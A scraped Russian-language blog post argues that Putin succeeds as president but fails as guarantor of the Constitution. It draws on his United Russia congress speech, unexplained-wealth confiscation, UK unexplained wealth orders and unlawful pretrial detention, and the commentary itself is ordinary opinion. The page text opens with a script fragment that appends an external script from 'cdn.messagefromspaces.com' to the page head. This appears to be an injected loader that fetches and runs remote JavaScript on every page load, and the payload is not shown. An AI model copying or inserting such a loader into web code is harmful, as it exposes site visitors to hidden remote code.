, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему Путин хорош, как Президент и никакой, как гарант Конституции?

24 Дек

Выступление Владимира Путина на пленарном заседании XVII съезда Всероссийской политической партии «Единая Россия» ещё раз подтвердило это. https://echo.msk.ru/blog/echomsk/2116176-echo/

Надо согласиться с тем, что ему, как Президенту России удалось обеспечить укрепление безопасности России, усилить её обороноспособность и повысить влияние в мире.

Нет возражений и по суждениям о том, что «вся наша работа — в экономике, социальной сфере, других областях — должна быть нацелена на сбережение нации, на решение задач демографического развития», как и призывам  «добиться долгосрочного устойчивого повышения реальных доходов граждан. Увеличить пенсии и социальную поддержку». Но где реальные шаги, направленные на реализацию сказанного и реальные меры по исполнению?

Радуют суждения Путина о том, что «нужно убрать все нечёткие, двусмысленные, размытые правовые нормы, которые нечистоплотные представители правоохранительных органов используют для «наезда» на бизнес, чтобы собирать дань, отнимать собственность». Но почему молчит о том, как наказали тех, кто только за два года обобрал около 500 000 предпринимателей, возбуждая неправомерно уголовные дела?

А как греют душу высказывания Путина: «Нам, безусловно, нужно продолжить работу по снижению количества людей, имеющих доходы ниже прожиточного минимума, снизить бедность, ее уровень и массовость, масштаб которой представляет угрозу для стабильности и единства нашего общества, это просто унижает людей». Но почему гарант Конституции заставляет шесть лет бездействовать норму, позволяющую конфисковать у чиновников все то, что они не смогли заработать даже за свои высокие зарплаты?

Ни дня не работавший в бизнесе Улюкаев, занимавший только госдолжности, обладает имуществом  более чем на 25 млн долларов https://versia.ru/otkuda-u-ulyukaeva-nedvizhimost-na-desyatki-millionov-dollarov   Суд же наложил штраф в виде 2 млн. долларов. А правомерность обладания имуществом на 23 млн. долларов, никто не стал проверять.

Почему робеет  гарант Конституции применять широко п.п. 8 п. 2 ст. 235 ГК РФ к своим назначенцам?  Уже и Конституционный Суд РФ высказался о правомерности применения такой меры к тем, кто не имеет доказательств на  приобретение имущества на законные доходы.

Приблизительные расчёты показывают, что эти меры не только бы оставили вороватых чиновников публично опозоренными дома, а не в СИЗО, но и позволили  в разы увеличить пенсии и социальные выплаты.

Исключить пребывание под стражей тех, кто обогащается криминальным путём позволил бы и Закон «О криминальных финансах». Он даст возможность направлять всем собственникам активов  «запрос о состоянии имущества необъясненного происхождения», как это предусматривается с 1 января в Великобритании (unexplained wealth orders, UWO) и никакого нарушения презумпции невиновности  в этой давно демократической стране не видят. Все согласны так бороться с криминальным обогащением.

Владелец компаний, недвижимости, банковских счетов, другого имущества, вызвавшего вопросы со стороны государственных органов, обязан  будет САМ  доказать  законность  происхождение средств. Но молчит о применении таких мер  Путин, к россиянам, что строят своё благополучие на криминальном обогащении.

Пойдут ли голосовать  за Путина почти 20 миллионов человек, что сейчас живут за чертой бедности? А те 9 миллионов, что ежегодно не получают статус «потерпевший» из-за того, что не возбуждают по их заявлениям уголовные дела?

Говоря о том, что «достойное место в будущем должно быть обеспечено для всех», он осознаёт несправедливость, сложившуюся в стране. Не всем россиянам открыты широкие возможности для успеха и самореализации.

Говоря о том, что ориентиром для нас должны служить права и свободы граждан, он ничего не говорит о том, как сделать обязанностью государства признание, соблюдение и защиту прав и свобод.

Уклоняется Путин и от ответа на вопрос: «Почему у нас треть сидит ни за что, а ещё треть — не за то?»

Если бы исполнял обязанности гаранта Конституции, то понял бы причину такого отношения к россиянам.

В статье 22 Конституции России говорится, что арест, заключение под стражу и содержание под стражей допускается только по судебному решению.

Казалось, что это правильно. Уголовное судопроизводство имеет  своим назначением: защиту личности от незаконного и необоснованного обвинения, осуждения, ограничения её прав и свобод (ст. 6 УПК РФ).

Кроме того, носители судебной власти обязаны исполнять принципы уголовного судопроизводства, по которым  никто не может быть задержан по подозрению в совершении преступления или заключён под стражу при отсутствии на то законных оснований, предусмотренных УПК РФ.

Заключение под стражу возможно только при наличии законного и обоснованного постановления о привлечении в качестве обвиняемого.

Но заключая под стражу, суды не проверяют исполнение порядка привлечения в качестве обвиняемого, что установлен в статье 171 УПК РФ. Они не проверяют, имел ли следователь достаточно доказательств, для обвинения лица в том преступлении, в котором обвинил.

Таким образом, осуществляющими уголовное преследование, а также судьями не исполняется  то, что требует Конституция РФ и принципы уголовного судопроизводства.

Поэтому и получается, что треть сидит ни за что, а ещё треть — не за то.

Перечисляя базовые ценности, Путин умалчивает о такой высшей ценности, как Человек, его права и свободы. Именно этой высшей ценностью хотел обладать единственный источник власти в стране, многонациональный народ, когда принимал Конституцию России, а гарант Конституции обязан был обеспечить  осуществление этой высшей ценности.

Очень верные суждения Президента России: «Хотел бы также подчеркнуть, что ничто так не подрывает стабильность и не крадёт ресурс развития как неправда, несправедливость, беззаконие, как коррупционная ржавчина и мздоимство, равнодушие к своей стране и отстранённость от нужд граждан, чванливость и высокомерие, от кого бы они ни исходили — от политиков, чиновников, бизнеса или от тех, кто называет себя элитой». Но, как противодействовать этому, ответа нет.

Путин говорит: «Быть ответственным — значит иметь ясную программу позитивных действий». Но где эта программа?

Путин и сейчас не понимает, что «решить те задачи, о которых он сам говорит» невозможно без власти Конституции России, обеспеченной её гарантом и правосудием.

Нет, голосовать за того, кто не способен выполнять обязанности гаранта Конституции, я не пойду.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.